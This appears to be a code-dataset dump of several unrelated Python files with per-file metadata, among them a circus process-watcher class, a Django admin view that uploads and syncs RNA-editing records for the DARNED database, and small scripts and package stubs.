- **args**: the arguments for the command to run. Can be a list or
a string. If **args** is a string, it's splitted using
:func:`shlex.split`. Defaults to None.
- **numprocesses**: Number of processes to run.
- **working_dir**: the working directory to run the command in. If
not provided, will default to the current working directory.
- **shell**: if *True*, will run the command in the shell
environment. *False* by default. **warning: this is a
security hazard**.
- **uid**: if given, is the user id or name the command should run
with. The current uid is the default.
- **gid**: if given, is the group id or name the command should run
with. The current gid is the default.
- **send_hup**: if True, a process reload will be done by sending
the SIGHUP signal. Defaults to False.
- **env**: a mapping containing the environment variables the command
will run with. Optional.
- **rlimits**: a mapping containing rlimit names and values that will
be set before the command runs.
- **stdout_stream**: a mapping that defines the stream for
the process stdout. Defaults to None.
Optional. When provided, *stdout_stream* is a mapping containing up to
three keys:
- **class**: the stream class. Defaults to
`circus.stream.FileStream`
- **filename**: the filename, if using a FileStream
- **refresh_time**: the delay between two stream checks. Defaults
to 0.3 seconds.
This mapping will be used to create a stream callable of the specified
class.
Each entry received by the callable is a mapping containing:
- **pid** - the process pid
- **name** - the stream name (*stderr* or *stdout*)
- **data** - the data
- **stderr_stream**: a mapping that defines the stream for
the process stderr. Defaults to None.
Optional. When provided, *stderr_stream* is a mapping containing up to
three keys:
- **class**: the stream class. Defaults to `circus.stream.FileStream`
- **filename**: the filename, if using a FileStream
- **refresh_time**: the delay between two stream checks. Defaults
to 0.3 seconds.
This mapping will be used to create a stream callable of the specified
class.
Each entry received by the callable is a mapping containing:
- **pid** - the process pid
- **name** - the stream name (*stderr* or *stdout*)
- **data** - the data
- **stream_backend** -- the backend that will be used for the streaming
process. Can be *thread* or *gevent*. When set to *gevent* you need
to have *gevent* and *gevent_zmq* installed. (default: thread)
- **priority** -- integer that defines a priority for the watcher. When
the Arbiter do some operations on all watchers, it will sort them
with this field, from the bigger number to the smallest.
(default: 0)
- **singleton** -- If True, this watcher has a single process.
(default:False)
= **use_sockets** -- XXX
- **copy_env** -- If True, the environment in which circus had been
run will be reproduced for the workers.
- **options** -- extra options for the worker. All options
found in the configuration file for instance, are passed
in this mapping -- this can be used by plugins for watcher-specific
options.
"""
def __init__(self, name, cmd, args=None, numprocesses=1, warmup_delay=0.,
working_dir=None, shell=False, uid=None, max_retry=5,
gid=None, send_hup=False, env=None, stopped=True,
graceful_timeout=30., prereload_fn=None,
rlimits=None, executable=None, stdout_stream=None,
stderr_stream=None, stream_backend='thread', priority=0,
singleton=False, use_sockets=False, copy_env=False,
**options):
self.name = name
self.use_sockets = use_sockets
self.res_name = name.lower().replace(" ", "_")
self.numprocesses = int(numprocesses)
self.warmup_delay = warmup_delay
self.cmd = cmd
self.args = args
self._process_counter = 0
self.stopped = stopped
self.graceful_timeout = graceful_timeout
self.prereload_fn = prereload_fn
self.executable = None
self.stream_backend = stream_backend
self.priority = priority
self.stdout_stream_conf = copy.copy(stdout_stream)
self.stderr_stream_conf = copy.copy(stderr_stream)
self.stdout_stream = get_stream(self.stdout_stream_conf)
self.stderr_stream = get_stream(self.stderr_stream_conf)
self.stdout_redirector = self.stderr_redirector = None
self.max_retry = max_retry
self._options = options
self.singleton = singleton
self.copy_env = copy_env
if singleton and self.numprocesses not in (0, 1):
raise ValueError("Cannot have %d processes with a singleton "
" watcher" % self.numprocesses)
self.optnames = (("numprocesses", "warmup_delay", "working_dir",
"uid", "gid", "send_hup", "shell", "env", "max_retry",
"cmd", "args", "graceful_timeout", "executable",
"use_sockets", "priority", "copy_env",
"singleton", "stdout_stream_conf", "stderr_stream_conf")
+ tuple(options.keys()))
if not working_dir:
# working dir hasn't been set
working_dir = util.get_working_dir()
self.working_dir = working_dir
self.processes = {}
self.shell = shell
self.uid = uid
self.gid = gid
if self.copy_env:
self.env = os.environ.copy()
if env is not None:
self.env.update(env)
else:
self.env = env
self.rlimits = rlimits
self.send_hup = send_hup
self.sockets = self.evpub_socket = None
def _create_redirectors(self):
if self.stdout_stream:
if (self.stdout_redirector is not None and
self.stdout_redirector.running):
self.stdout_redirector.kill()
self.stdout_redirector = get_pipe_redirector(self.stdout_stream,
backend=self.stream_backend)
else:
self.stdout_redirector = None
if self.stderr_stream:
if (self.stderr_redirector is not None and
self.stderr_redirector.running):
self.stderr_redirector.kill()
self.stderr_redirector = get_pipe_redirector(self.stderr_stream,
backend=self.stream_backend)
else:
self.stderr_redirector = None
@classmethod
def load_from_config(cls, config):
if 'env' in config:
config['env'] = parse_env(config['env'])
return cls(name=config.pop('name'), cmd=config.pop('cmd'), **config)
@util.debuglog
def initialize(self, evpub_socket, sockets):
self.evpub_socket = evpub_socket
self.sockets = sockets
def __len__(self):
return len(self.processes)
def notify_event(self, topic, msg):
"""Publish a message on the event publisher channel"""
json_msg = json.dumps(msg)
if isinstance(json_msg, unicode):
json_msg = json_msg.encode('utf8')
if isinstance(self.res_name, unicode):
name = self.res_name.encode('utf8')
else:
name = self.res_name
multipart_msg = ["watcher.%s.%s" % (name, topic), json.dumps(msg)]
if not self.evpub_socket.closed:
self.evpub_socket.send_multipart(multipart_msg)
@util.debuglog
def reap_process(self, pid, status):
"""ensure that the process is killed (and not a zombie)"""
process = self.processes.pop(pid)
# get return code
if os.WIFSIGNALED(status):
retcode = os.WTERMSIG(status)
# process exited using exit(2) system call; return the
# integer exit(2) system call has been called with
elif os.WIFEXITED(status):
retcode = os.WEXITSTATUS(status)
else:
# should never happen
raise RuntimeError("Unknown process exit status")
# if the process is dead or a zombie try to definitely stop it.
if retcode in (STATUS_ZOMBIE, STATUS_DEAD):
process.stop()
logger.debug('reaping process %s [%s]' % (pid, self.name))
self.notify_event("reap", {"process_pid": pid, "time": time.time()})
@util.debuglog
def reap_processes(self):
"""Reap all the processes for this watcher.
"""
if self.stopped:
logger.debug('do not reap processes as the watcher is stopped')
return
while True:
try:
# wait for completion of all the childs of circus, if it
# pertains to this watcher. Call reap on it.
pid, status = os.waitpid(-1, os.WNOHANG)
if not pid:
return
if pid in self.processes:
self.reap_process(pid, status)
if self.stopped:
logger.debug('watcher have been stopped, exit the loop')
return
except OSError as e:
if e.errno == errno.EAGAIN:
time.sleep(0.001)
continue
elif e.errno == errno.ECHILD:
return
else:
raise
@util.debuglog
def manage_processes(self):
""" manage processes
"""
if self.stopped:
return
if len(self.processes) < self.numprocesses:
self.spawn_processes()
processes = self.processes.values()
processes.sort()
while len(processes) > self.numprocesses:
process = processes.pop(0)
if process.status == STATUS_DEAD:
self.processes.pop(process.pid)
else:
self.processes.pop(process.pid)
self.kill_process(process)
@util.debuglog
def reap_and_manage_processes(self):
"""Reap & manage processes.
"""
if self.stopped:
return
self.reap_processes()
self.manage_processes()
@util.debuglog
def spawn_processes(self):
"""Spawn processes.
"""
for i in range(self.numprocesses - len(self.processes)):
self.spawn_process()
time.sleep(self.warmup_delay)
def _get_sockets_fds(self):
# XXX should be cached
fds = {}
for name, sock in self.sockets.items():
fds[name] = sock.fileno()
return fds
def spawn_process(self):
"""Spawn process.
"""
if self.stopped:
return
cmd = util.replace_gnu_args(self.cmd, sockets=self._get_sockets_fds())
self._process_counter += 1
nb_tries = 0
while nb_tries < self.max_retry:
process = None
try:
process = Process(self._process_counter, cmd,
args=self.args, working_dir=self.working_dir,
shell=self.shell, uid=self.uid, gid=self.gid,
env=self.env, rlimits=self.rlimits,
executable=self.executable, use_fds=self.use_sockets,
watcher=self)
# stream stderr/stdout if configured
if self.stdout_redirector is not None:
self.stdout_redirector.add_redirection('stdout',
process,
process.stdout)
if self.stderr_redirector is not None:
self.stderr_redirector.add_redirection('stderr',
process,
process.stderr)
self.processes[process.pid] = process
logger.debug('running %s process [pid %d]', self.name,
process.pid)
except OSError, e:
logger.warning('error in %r: %s', self.name, str(e))
if process is None:
nb_tries += 1
continue
else:
self.notify_event("spawn", {"process_pid": process.pid,
"time": time.time()})
time.sleep(self.warmup_delay)
return
self.stop()
def kill_process(self, process, sig=signal.SIGTERM):
"""Kill process.
"""
# remove redirections
if self.stdout_redirector is not None:
self.stdout_redirector.remove_redirection('stdout', process)
if self.stderr_redirector is not None:
self.stderr_redirector.remove_redirection('stderr', process)
try:
self.send_signal(process.pid, sig)
self.notify_event("kill", {"process_pid": process.pid,
"time": time.time()})
except NoSuchProcess:
# already dead !
return
process.stop()
@util.debuglog
def kill_processes(self, sig):
"""Kill all the processes of this watcher.
"""
for process in self.get_active_processes():
try:
self.kill_process(process, sig)
except OSError as e:
if e.errno != errno.ESRCH:
raise
@util.debuglog
def send_signal(self, pid, signum):
if pid in self.processes:
process = self.processes[pid]
process.send_signal(signum)
else:
logger.debug('process %s does not exist' % pid)
def send_signal_processes(self, signum):
for pid in self.processes:
try:
self.send_signal(pid, signum)
except OSError as e:
if e.errno != errno.ESRCH:
raise
@util.debuglog
def send_signal_child(self, pid, child_id, signum):
"""Send signal to a child.
"""
process = self.processes[pid]
try:
process.send_signal_child(int(child_id), signum)
except OSError as e:
if e.errno != errno.ESRCH:
raise
@util.debuglog
def send_signal_children(self, pid, signum):
"""Send signal to all children.
"""
process = self.processes[int(pid)]
process.send_signal_children(signum)
@util.debuglog
def status(self):
if self.stopped:
return "stopped"
return "active"
@util.debuglog
def process_info(self, pid):
process = self.processes[int(pid)]
return process.info()
@util.debuglog
def info(self):
return dict([(proc.pid, proc.info())\
for proc in self.processes.values()])
@util.debuglog
def stop(self):
"""Stop.
"""
logger.debug('stopping the %s watcher' % self.name)
# stop redirectors
if self.stdout_redirector is not None:
self.stdout_redirector.kill()
if self.stderr_redirector is not None:
self.stderr_redirector.kill()
limit = time.time() + self.graceful_timeout
logger.debug('gracefully stopping processes [%s] for %ss' % (
self.name, self.graceful_timeout))
while self.get_active_processes() and time.time() < limit:
self.kill_processes(signal.SIGTERM)
try:
time.sleep(0.1)
except KeyboardInterrupt:
pass
self.reap_processes()
self.kill_processes(signal.SIGKILL)
if self.evpub_socket is not None:
self.notify_event("stop", {"time": time.time()})
self.stopped = True
logger.info('%s stopped', self.name)
def get_active_processes(self):
"""return a list of pids of active processes (not already stopped)"""
return [p for p in self.processes.values()
if p.status not in (DEAD_OR_ZOMBIE, UNEXISTING)]
@property
def pids(self):
"""Returns a list of PIDs"""
return [process.pid for process in self.processes]
@util.debuglog
def start(self):
"""Start.
"""
if not self.stopped:
return
self.stopped = False
self._create_redirectors()
self.reap_processes()
self.manage_processes()
if self.stdout_redirector is not None:
self.stdout_redirector.start()
if self.stderr_redirector is not None:
self.stderr_redirector.start()
logger.info('%s started' % self.name)
self.notify_event("start", {"time": time.time()})
@util.debuglog
def restart(self):
"""Restart.
"""
self.notify_event("restart", {"time": time.time()})
self.stop()
self.start()
logger.info('%s restarted', self.name)
@util.debuglog
def reload(self, graceful=True):
""" reload
"""
if self.prereload_fn is not None:
self.prereload_fn(self)
if not graceful:
return self.restart()
if self.send_hup:
for process in self.processes.values():
logger.info("SENDING HUP to %s" % process.pid)
process.send_signal(signal.SIGHUP)
else:
for i in range(self.numprocesses):
self.spawn_process()
self.manage_processes()
self.notify_event("reload", {"time": time.time()})
logger.info('%s reloaded', self.name)
@util.debuglog
def incr(self, nb=1):
if self.singleton and self.numprocesses == 1:
raise ValueError('Singleton watcher has a single process')
self.numprocesses += nb
self.manage_processes()
return self.numprocesses
@util.debuglog
def decr(self, nb=1):
if self.numprocesses > 0:
self.numprocesses -= nb
self.manage_processes()
return self.numprocesses
def set_opt(self, key, val):
"""Set a watcher option.
This function set the watcher options. unknown keys are ignored.
This function return an action number:
- 0: trigger the process management
- 1: trigger a graceful reload of the processes;
"""
action = 0
if key in self._options:
self._options[key] = val
action = -1 # XXX for now does not trigger a reload
elif key == "numprocesses":
val = int(val)
if self.singleton and val > 1:
raise ValueError('Singleton watcher has a single process')
self.numprocesses = val
elif key == "warmup_delay":
self.warmup_delay = float(val)
elif key == "working_dir":
self.working_dir = val
action = 1
elif key == "uid":
self.uid = util.to_uid(val)
action = 1
elif key == "gid":
self.gid = util.to_gid(val)
action = 1
elif key == "send_hup":
self.send_hup = val
elif key == "shell":
self.shell = val
action = 1
elif key == "env":
self.env = val
action = 1
elif key == "cmd":
self.cmd = val
action = 1
elif key == "graceful_timeout":
self.graceful_timeout = float(val)
action = -1
# send update event
self.notify_event("updated", {"time": time.time()})
return action
def do_action(self, num):
# trigger needed action
self.stopped = False
if num == 1:
for i in range(self.numprocesses):
self.spawn_process()
self.manage_processes()
else:
self.reap_and_manage_processes()
@util.debuglog
def options(self, *args):
options = []
for name in sorted(self.optnames):
if name in self._options:
options.append((name, self._options[name]))
else:
options.append((name, getattr(self, name)))
return options
| 33.29108
| 79
| 0.56889
| 20,895
| 0.982231
| 0
| 0
| 7,978
| 0.375029
| 0
| 0
| 6,172
| 0.290133
|
4739f9dd85a98ca4914a3d95480d40fee9c3fdfc
| 192
|
py
|
Python
|
ex021.py
|
Jordemar-D-Bousquet/Exercicios_Python
|
705d4c83720db033841f01aa843e4dbab08f1423
|
[
"MIT"
] | null | null | null |
ex021.py
|
Jordemar-D-Bousquet/Exercicios_Python
|
705d4c83720db033841f01aa843e4dbab08f1423
|
[
"MIT"
] | null | null | null |
ex021.py
|
Jordemar-D-Bousquet/Exercicios_Python
|
705d4c83720db033841f01aa843e4dbab08f1423
|
[
"MIT"
] | null | null | null |
# Faça um programa em Python que abra e reproduza o áudio de um arquivo MP3.
from pygame import mixer
mixer.init()
mixer.music.load('ex021.mp3')
mixer.music.play()
input('Agora vc escuta?')
| 21.333333
| 76
| 0.744792
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 107
| 0.551546
|
473a4e921e84f823480cb7ff0d481a46699ba915
| 15,171
|
py
|
Python
|
admin_views.py
|
JackCurragh/DARNED
|
13963d129bd8f69fb1106ad1f47394b3211a939c
|
[
"MIT"
] | null | null | null |
admin_views.py
|
JackCurragh/DARNED
|
13963d129bd8f69fb1106ad1f47394b3211a939c
|
[
"MIT"
] | null | null | null |
admin_views.py
|
JackCurragh/DARNED
|
13963d129bd8f69fb1106ad1f47394b3211a939c
|
[
"MIT"
] | null | null | null |
from django.http import HttpResponseRedirect, HttpResponse
from django.shortcuts import render_to_response
from django.core.context_processors import csrf
from admin_forms import *
from django.template import loader,RequestContext
from django.contrib.admin.views.decorators import staff_member_required
from Human.models import *
from Drosophila.models import *
from Mouse.models import *
#######UCSC Tables########
###For UCSC gene, SNP and Alu#####
##########################
#from models import *
from os import system
##############################################
########Thoughts for implementation##########
#Current state of update########
pth = "/home/DATA/Anmol/DARNED/uploaded_data/"#"/home/common_share/DARNED/uploaded_data"
dbpth= "/home/DATA/Anmol/DARNED/"#"/home/common_share/DARNED"
# Try to add information about assembly. And make it auto updatable
def saveData(uploadedFileName):
uploadedfile = str(uploadedFileName)
# saving input file content
#print uploadedfile
destination = open('%s/%s'%(pth,uploadedfile),'wb+')
for chunk in uploadedFileName.chunks():
destination.write(chunk)
destination.close()
######Human update start########
def human(flname):
infile = open("%s/%s"%(pth,flname))
outfile = open("%s/%s.err"%(pth,flname),"w")
for line in infile:
data = line[:-1].split('\t')
#tmplt = loader.
# print "Send Error that it is no related to humans"
coor = HSCoordinate.objects.filter(assembly=int(data[0]),chrom=data[1],coordinate=int(data[2]),strand=data[3],indna = data[4],inref = data[5], inrna = data[6])#add nucleotide info
if len(coor) != 0:
if data[15] != '-':
tissues = data[15].split(',')
for tissue in tissues:
if len(tissue)<2:
continue
#print tissue.upper(),"Anmol"
tis = coor.filter(source__source = tissue.upper())
if len(tis) == 0:
try:
tss = HSSource.objects.get(source=tissue.upper())
except:
tss = HSSource.objects.create(source=tissue.upper())
for cr in coor:
cr.source.add(tss)
pubids = data[16].split(':')
authors = data[17].split(':')
years = data[18].split(':')
pubnum = len(pubids)
for j in range(pubnum):
pbd = coor.filter(pubid__pubid=pubids[j])
if len(pbd) == 0:
try:
pbdx = HSPubMed.objects.get(pubid=pubids[j])
except:
pbdx = HSPubMed.objects.create(pubid = pubids[j],author=authors[j],year=years[j])
for cr in coor:
cr.pubid.add(pbdx)
else:
coor = HSCoordinate.objects.create(assembly=int(data[0]),chrom=data[1],coordinate=int(data[2]),strand=data[3], indna=data[4],inref=data[5],inrna=data[6],seqtype = data[12])
if data[7] != '-':
coor.snp = data[7]
if data[8]=='+':
coor.snpunvalid = 1
else:
coor.snpunvalid = 0
validations = data[9].split(',')
for validation in validations:
try:
vld = HSSnpValidation.objects.get(validation=validation)
except:
vld = HSSnpValidation.objects.create(validation=validation)
coor.snpvalidation.add(vld)
#print data[11]
if data[10] != '-':
if data[12] == 'E':
coor.exotype = data[13]
try:
gene = HSGene.objects.get(gene=data[10])
except:
#print data[10],data[11],data[12],data[13]
gene = HSGene.objects.create(gene=data[10],geneid=int(data[11]))
coor.gene = gene
if data[14] != '-':
coor.alu = data[14]
if data[15] != '-':
sources = data[15].split(',')
for source in sources:
if len(source) <2:
continue
try:
src = HSSource.objects.get(source = source.upper())
except:
src = HSSource.objects.create(source = source.upper())
coor.source.add(src)
pubmeds = data[16].split(':')
authors = data[17].split(':')
years = data[18].split(':')
pubnum = len(pubmeds)
for j in range(pubnum):
try:
pbd = HSPubMed.objects.get(pubid=pubmeds[j])
except:
pbd = HSPubMed.objects.create(pubid = pubmeds[j],author = authors[j],year=years[j])
coor.pubid.add(pbd)
coor.save()
infile.close()
outfile.close()
#######Human update End######
########Drosophila Update Start#######
def drosophila(flname):#add assembly and from to and refid
infile = open("%s/%s"%(pth,flname))
for line in infile:
data = line[:-1].split('\t')
coor = DMCoordinate.objects.filter(assembly=data[0],chrom=data[1],coordinate=int(data[2]),strand=data[3],indna=data[4],inref=data[5],inrna=data[6])
if len(coor) != 0:
pbd = coor.filter(pubid__pubid=data[12])
if len(pbd) == 0:
try:
pbdx = DMPubMed.objects.get(pubid=data[12])
except:
pbdx = DMPubMed.objects.create(pubid = data[12],author= data[13],year=data[14])
for cr in coor:
cr.pubid.add(pbdx)
else:
coor = DMCoordinate.objects.create(assembly=data[0],chrom=data[1],coordinate=int(data[2]),strand=data[3], indna=data[4],inref=data[5],inrna=data[6],seqtype = data[9])
if data[7] != '-':
if data[9] == 'E':
coor.exotype = data[10]
try:
gene = DMGene.objects.get(gene=data[7])
except:
gene = DMGene.objects.create(gene=data[7],geneid=data[8])
coor.gene = gene
if data[11] != '-':
coor.alu = data[11]
try:
pbd = DMPubMed.objects.get(pubid=data[12])
except:
pbd = DMPubMed.objects.create(pubid = data[12],author = data[13],year=data[14])
coor.pubid.add(pbd)
coor.save()
infile.close()
######Drosophila update End#####
########Mouse Update Start#######
def mouse(flname):
infile = open("%s/%s"%(pth,flname))
outfile = open("%s/%s.err"%(pth,flname),"w")
for line in infile:
data = line[:-1].split('\t')
#print data
#tmplt = loader.
#print "Send Error that it is no related to humans"
coor = MMCoordinate.objects.filter(assembly=int(data[0]),chrom=data[1],coordinate=int(data[2]),strand=data[3],indna = data[4],inref = data[5], inrna = data[6])#add nucleotide info
if len(coor) != 0:
if data[15] != '-':
tissues = data[15].split(',')
for tissue in tissues:
if len(tissue)<2:
continue
#print tissue.upper(),"Anmol"
tis = coor.filter(source__source = tissue.upper())
if len(tis) == 0:
try:
tss = MMSource.objects.get(source=tissue.upper())
except:
tss = MMSource.objects.create(source=tissue.upper())
for cr in coor:
cr.source.add(tss)
pubids = data[16].split(':')
authors = data[17].split(':')
years = data[18].split(':')
pubnum = len(pubids)
for j in range(pubnum):
pbd = coor.filter(pubid__pubid=pubids[j])
if len(pbd) == 0:
try:
pbdx = MMPubMed.objects.get(pubid=pubids[j])
except:
pbdx = MMPubMed.objects.create(pubid = pubids[j],author=authors[j],year=years[j])
for cr in coor:
cr.pubid.add(pbdx)
else:
coor = MMCoordinate.objects.create(assembly=int(data[0]),chrom=data[1],coordinate=int(data[2]),strand=data[3], indna=data[4],inref=data[5],inrna=data[6],seqtype = data[12])
if data[7] != '-':
coor.snp = data[7]
if data[8]=='+':
coor.snpunvalid = 1
else:
coor.snpunvalid = 0
validations = data[9].split(',')
for validation in validations:
try:
vld = MMSnpValidation.objects.get(validation=validation)
except:
vld = MMSnpValidation.objects.create(validation=validation)
coor.snpvalidation.add(vld)
#print data[11]
if data[10] != '-':
if data[12] == 'E':
coor.exotype = data[13]
try:
gene = MMGene.objects.get(gene=data[10])
except:
#print data[10],data[11],data[12],data[13]
gene = MMGene.objects.create(gene=data[10],geneid=int(data[11]))
coor.gene = gene
if data[14] != '-':
coor.alu = data[14]
if data[15] != '-':
sources = data[15].split(',')
for source in sources:
if len(source) <2:
continue
try:
src = MMSource.objects.get(source = source.upper())
except:
src = MMSource.objects.create(source = source.upper())
coor.source.add(src)
pubmeds = data[16].split(':')
authors = data[17].split(':')
years = data[18].split(':')
pubnum = len(pubmeds)
for j in range(pubnum):
try:
pbd = MMPubMed.objects.get(pubid=pubmeds[j])
except:
pbd = MMPubMed.objects.create(pubid = pubmeds[j],author = authors[j],year=years[j])
coor.pubid.add(pbd)
coor.save()
infile.close()
outfile.close()
#####Mouse Update End ##################
def upload_file(request):
if request.method == 'POST':
form = File_Upload(request.POST,request.FILES)
if form.is_valid():
filename = request.FILES['filename']
org = request.POST['org']
#exit(1)
flname = str(filename)
saveData(request.FILES['filename'])
if org=='HU':
human(flname)
elif org=='DR':
drosophila(flname)
elif org=='MO':
mouse(flname)
#return HttpResponseRedirect('/success/url/')# Write about successful file upload and logs on page.redirect link using a midddle file. put that file in temp folder
# else:
form = File_Upload()
toform = {'form':form,
'action':'/upload/'#it was /hu/
}
tmplt = loader.get_template('admin/data_upload.html')
return HttpResponse(tmplt.render(RequestContext(request,toform)))
# return render_to_response('/home/manu/Desktop/DARNED/templates/admin/uploadfile.html',{'form':form})
def sync(request):
###Human sync##########
for j in range(18,20):
hsfile = open("%s/staticfiles/downloads/hg%d.txt"%(dbpth,j),"w")
hsfile.write("chrom\tcoordinate\tstrand\tinchr\tinrna\tgene\tseqReg\texReg\tsource\tPubMed ID\n")
coors = HSCoordinate.objects.filter(assembly=j)
for coor in coors:
tsource = ""
tpub = ""
tgene = ""
tseq = "O"
texo = ""
if coor.gene != None:
tgene = coor.gene.gene
if coor.exotype !=None:
tseq = "E"
texo = coor.exotype
else:
tseq = "I"
for src in coor.source.all():
tsource += ",%s"%src.source
for pbd in coor.pubid.all():
tpub +=",%d"%pbd.pubid
hsfile.write("%s\t%d\t%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s\n"%(coor.chrom,coor.coordinate,coor.strand,coor.indna,coor.inrna,tgene,tseq,texo,tsource[1:],tpub[1:]))
hsfile.close()
###Mouse sync##########
for j in range(9,11):
mmfile = open("%s/staticfiles/downloads/mm%d.txt"%(dbpth,j),"w")
mmfile.write("chrom\tcoordinate\tstrand\tinchr\tinrna\tgene\tseqReg\texReg\tsource\tPubMed ID\n")
coors = MMCoordinate.objects.filter(assembly=j)
for coor in coors:
tsource = ""
tpub = ""
tgene = ""
tseq = "O"
texo = ""
if coor.gene != None:
tgene = coor.gene.gene
if coor.exotype !=None:
tseq = "E"
texo = coor.exotype
else:
tseq = "I"
#for src in coor.source.all():
# tsource += ",%s"%src.source
for pbd in coor.pubid.all():
tpub +=",%d"%pbd.pubid
mmfile.write("%s\t%d\t%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s\n"%(coor.chrom,coor.coordinate,coor.strand,coor.indna,coor.inrna,tgene,tseq,texo,tsource[1:],tpub[1:]))
mmfile.close()
####Drosophila Sync###########
for j in range(3,4):
dmfile = open("%s/staticfiles/downloads/dm%d.txt"%(dbpth,j),"w")
dmfile.write("chrom\tcoordinate\tstrand\tinchr\tinrna\tgene\tseqReg\texReg\tPubMed ID\n")
coors = DMCoordinate.objects.filter(assembly=3)
for coor in coors:
tpub=""
tgene = ""
tseq = "O"
texo = ""
if coor.gene != None:
tgene=coor.gene.gene
if coor.exotype != None:
tseq = "E"
texo = coor.exotype
else:
tseq="I"
for pbd in coor.pubid.all():
tpub += ",%d"%pbd.pubid
dmfile.write("%s\t%d\t%s\t%s\t%s\t%s\t%s\t%s\t%s\n"%(coor.chrom,coor.coordinate,coor.strand,coor.indna,coor.inrna,tgene,tseq,texo,tpub[1:]))
dmfile.close()
tmplt = loader.get_template("message.html")
return HttpResponse(tmplt.render(RequestContext(request,{'message':'Update finished'})))
upload_file = staff_member_required(upload_file)# This is make function acceible only to administers
sync = staff_member_required(sync)
# Remove delete options from default admin page. It may create trouble, If you don't remove.
| 40.564171
| 187
| 0.497265
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 2,515
| 0.165777
|
473a6e55a1141afc8bdd4f4dc054a62915b0f948
| 320
|
py
|
Python
|
Module 2/Chapter 7/ch7_yahooweatherapi.py
|
saicharanabhishek/machinelearning_examples
|
f89857ae7e1a2baa76951fe1d55541832d0f0d20
|
[
"MIT"
] | 101
|
2016-11-08T11:17:55.000Z
|
2021-12-24T10:43:32.000Z
|
Module 2/Chapter 7/ch7_yahooweatherapi.py
|
saicharanabhishek/machinelearning_examples
|
f89857ae7e1a2baa76951fe1d55541832d0f0d20
|
[
"MIT"
] | 2
|
2017-11-28T11:22:25.000Z
|
2019-02-12T17:09:18.000Z
|
Module 2/Chapter 7/ch7_yahooweatherapi.py
|
saicharanabhishek/machinelearning_examples
|
f89857ae7e1a2baa76951fe1d55541832d0f0d20
|
[
"MIT"
] | 102
|
2016-10-22T12:14:23.000Z
|
2022-03-26T19:59:09.000Z
|
import urllib, json
baseurl = 'https://query.yahooapis.com/v1/public/yql?'
yql_query = "select item.condition from weather.forecast where woeid=9807"
yql_url = baseurl + urllib.urlencode({'q':yql_query}) + "&format=json"
result = urllib.urlopen(yql_url).read()
data = json.loads(result)
print data['query']['results']
| 32
| 74
| 0.7375
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 139
| 0.434375
|
473a74f5da28e0b4ce33777ece6a2e2116a72644
| 1,697
|
py
|
Python
|
lib/assets/Lib/signal.py
|
s6007589/cafe-grader-web
|
18a993801c698fb7b7ec6ae5f4b67920503cb242
|
[
"MIT"
] | 25
|
2016-09-04T07:34:13.000Z
|
2022-02-14T07:39:02.000Z
|
lib/assets/Lib/signal.py
|
it56660024/cafe-grader-web
|
e9a1305fd62e79e54f6961f97ddc5cd57bafd73c
|
[
"MIT"
] | 25
|
2015-02-05T03:59:27.000Z
|
2022-02-11T16:54:04.000Z
|
lib/assets/Lib/signal.py
|
it56660024/cafe-grader-web
|
e9a1305fd62e79e54f6961f97ddc5cd57bafd73c
|
[
"MIT"
] | 16
|
2016-09-05T00:30:27.000Z
|
2021-12-05T11:07:02.000Z
|
"""This module provides mechanisms to use signal handlers in Python.
Functions:
alarm() -- cause SIGALRM after a specified time [Unix only]
setitimer() -- cause a signal (described below) after a specified
float time and the timer may restart then [Unix only]
getitimer() -- get current value of timer [Unix only]
signal() -- set the action for a given signal
getsignal() -- get the signal action for a given signal
pause() -- wait until a signal arrives [Unix only]
default_int_handler() -- default SIGINT handler
signal constants:
SIG_DFL -- used to refer to the system default handler
SIG_IGN -- used to ignore the signal
NSIG -- number of defined signals
SIGINT, SIGTERM, etc. -- signal numbers
itimer constants:
ITIMER_REAL -- decrements in real time, and delivers SIGALRM upon
expiration
ITIMER_VIRTUAL -- decrements only when the process is executing,
and delivers SIGVTALRM upon expiration
ITIMER_PROF -- decrements both when the process is executing and
when the system is executing on behalf of the process.
Coupled with ITIMER_VIRTUAL, this timer is usually
used to profile the time spent by the application
in user and kernel space. SIGPROF is delivered upon
expiration.
*** IMPORTANT NOTICE ***
A signal handler function is called with two arguments:
the first is the signal number, the second is the interrupted stack frame."""
CTRL_BREAK_EVENT=1
CTRL_C_EVENT=0
NSIG=23
SIGABRT=22
SIGBREAK=21
SIGFPE=8
SIGILL=4
SIGINT=2
SIGSEGV=11
SIGTERM=15
SIG_DFL=0
SIG_IGN=1
def signal(signalnum, handler) :
pass
| 32.634615
| 78
| 0.700059
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,501
| 0.884502
|
473ed6ec1fc8acc6f0c2b764921eaea82a6ea886
| 400
|
py
|
Python
|
npc_engine/service_clients/__init__.py
|
npc-engine/npc-engine
|
0047794e96369c23515f794a1e77009c516a382c
|
[
"MIT"
] | 12
|
2021-11-10T21:03:19.000Z
|
2022-03-21T21:55:34.000Z
|
npc_engine/service_clients/__init__.py
|
npc-engine/npc-engine
|
0047794e96369c23515f794a1e77009c516a382c
|
[
"MIT"
] | 1
|
2021-12-05T14:51:44.000Z
|
2021-12-05T14:51:44.000Z
|
npc_engine/service_clients/__init__.py
|
npc-engine/npc-engine
|
0047794e96369c23515f794a1e77009c516a382c
|
[
"MIT"
] | null | null | null |
# flake8: noqa
"""Module implementing the clients for services."""
from npc_engine.service_clients.text_generation_client import TextGenerationClient
from npc_engine.service_clients.control_client import ControlClient
from npc_engine.service_clients.sequence_classifier_client import (
SequenceClassifierClient,
)
from npc_engine.service_clients.similarity_client import SimilarityClient
| 44.444444
| 83
| 0.8525
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 66
| 0.165
|
473f1e1eeb6b340b2ca16fc3da17da150f626195
| 661
|
py
|
Python
|
setup.py
|
libre-man/DJFeet
|
7517e7930bdc23d22765c64d7351d4011515dcaa
|
[
"MIT"
] | 2
|
2018-09-29T22:41:28.000Z
|
2018-10-02T16:07:11.000Z
|
setup.py
|
libre-man/DJFeet
|
7517e7930bdc23d22765c64d7351d4011515dcaa
|
[
"MIT"
] | null | null | null |
setup.py
|
libre-man/DJFeet
|
7517e7930bdc23d22765c64d7351d4011515dcaa
|
[
"MIT"
] | null | null | null |
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
config = {
'description': 'A program does that is a DJ by using feedback provided by the dancers.',
'author': 'Thomas Schaper',
'url': 'https://gitlab.com/SilentDiscoAsAService/DJFeet',
